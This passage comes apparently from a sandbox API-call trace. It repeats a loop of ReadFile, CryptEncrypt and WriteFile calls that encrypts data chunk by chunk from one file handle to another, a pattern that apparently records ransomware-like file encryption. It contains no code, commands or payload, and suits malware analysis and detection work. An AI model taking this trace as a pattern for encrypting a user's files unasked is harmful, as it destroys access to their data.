lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.164] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.164] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.164] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.164] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.164] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.164] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.164] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.164] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.165] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.165] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.165] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.165] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.165] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.165] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.165] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.165] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.165] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.165] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.165] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.165] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.165] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.165] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.165] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.166] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.166] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.166] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.166] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.166] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.166] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.166] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.166] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.166] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.166] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.166] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.166] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.166] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.166] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.166] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.167] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.167] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.167] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.167] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.167] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.167] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.167] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.167] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.167] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.167] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.167] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.167] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.167] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.167] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.167] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.168] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.168] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.168] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.168] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.168] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.168] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.168] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.168] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.168] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.168] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.168] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.168] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.168] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.168] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.168] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.168] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.169] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.169] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.169] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.169] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.169] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.169] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.169] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.169] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.169] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.169] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.169] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.169] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.169] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.169] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.169] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.170] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.170] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.170] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.170] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.170] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.170] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.170] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.170] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.170] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.170] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.170] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.170] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.170] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.170] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.170] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.171] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.171] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.171] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.171] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.171] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: 